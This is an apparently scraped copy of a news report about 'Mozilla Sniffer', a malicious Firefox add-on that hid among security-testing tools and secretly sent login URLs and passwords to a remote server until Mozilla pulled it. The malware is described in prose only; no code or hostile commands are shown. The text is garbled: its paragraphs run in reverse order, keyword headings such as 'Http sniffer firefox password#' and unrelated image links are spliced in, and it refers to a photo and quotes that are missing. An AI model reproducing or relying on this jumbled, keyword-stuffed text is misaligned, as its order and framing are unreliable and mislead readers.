Many web applications that undergo security testing are not production ready and may have exposed vast amounts of data and resources to whoever has been harvesting the URLs and passwords stolen by this add-on. Mozilla subsequently confirmed that they had not reviewed this add-on and are currently working on a new security model that will require all add-ons to be code-reviewed before becoming discoverable on. Readers of All Things Digital may recognise the photograph as being of deputy managing editor John Paczkowski, who has confirmed to Netcraft that he is not the owner of this Mozilla account and that someone else has used his photo.Īlthough the Mozilla Sniffer extension was labeled as 'experimental', the malicious author tried to add credence by claiming it had been "validated by MOZILLA validation and reviewed by more than one addon developers" : The fraudster responsible for creating the malicious add-on claims (in poor English) to have been developing Mozilla add-ons since 2009, yet only created an account on the site last month: Mozilla will be automatically disabling the add-on for anyone who has downloaded and installed it.īefore the add-on was pulled, Hartmann also posted a short review to warn other users:
Http sniffer firefox password#
This function searches for any forms that have non-empty password fields and then uses two other functions to send the purloined data to the fraudster:Īfter working out that the Mozilla Sniffer add-on was at fault, Hartmann reported the problem to and was impressed by Mozilla's fast and professional response - he received a reply within minutes and the extension was pulled from the site shortly afterwards. This injects a new search() function, which is called whenever a form is submitted by the browser. The Mozilla Sniffer add-on overwrote some of the original Tamper Data files, and also added a new script named tamperPost.js.
![http sniffer firefox http sniffer firefox](http://www.cn.orcabrowser.com/images/avantdownloader.png)
![http sniffer firefox http sniffer firefox](https://blogs.sap.com/wp-content/uploads/2014/11/capture1_581808.jpg)
Hartmann said this was a "nice way of hiding backdoor code".
Http sniffer firefox code#
He was surprised to find the backdoor code in a popular security testing add-on called Tamper Data, although this was because the real rogue add-on - Mozilla Sniffer - was sharing the same UUID as the Tamper Data add-on, which meant it had overwritten the contents of the well-trusted Tamper Data directory. Hartmann assumed that this nefarious behaviour was caused by one of the new add-ons he had just installed, so he set about extracting the source code from the add-ons and searched for the hidden URL. This request transmitted his username and password to the remote server, as well as the URL of the login page. When Hartmann logged into his friend's game, he noticed an unusual HTTP request being made to an unrelated address at.
Http sniffer firefox pro#
I started Burp Suite Pro in parallel to check whatĪdditional help I can get from the extensions, and to watch what they Me and started to have a look at a friend's online game from a security
![http sniffer firefox http sniffer firefox](https://sm.pcmag.com/t/pcmag_au/photo/s/start-page/start-page_qdq4.1024.jpg)
Security Collection a try, installed a bundle of extensions unknown to The backdoor was fortunately discovered by Mozilla user Johann-Peter Hartmann of SektionEins while he was using the Mozilla Sniffer add-on to test the security of a friend's online game. However, using the Mozilla Sniffer add-on would have introduced an unexpected vulnerability in any application being tested - whenever a login form was submitted, the add-on secretly sent a copy of the URL, password and other details to an IP address presumably controlled by the malicious author. This set of tools is popular within the security community, as it simplifies the process of discovering vulnerabilities in web applications. The rogue Mozilla Sniffer add-on was included in the Web Application Security Penetration Testing collection. A backdoor has been discovered among a collection of security testing tools for Firefox.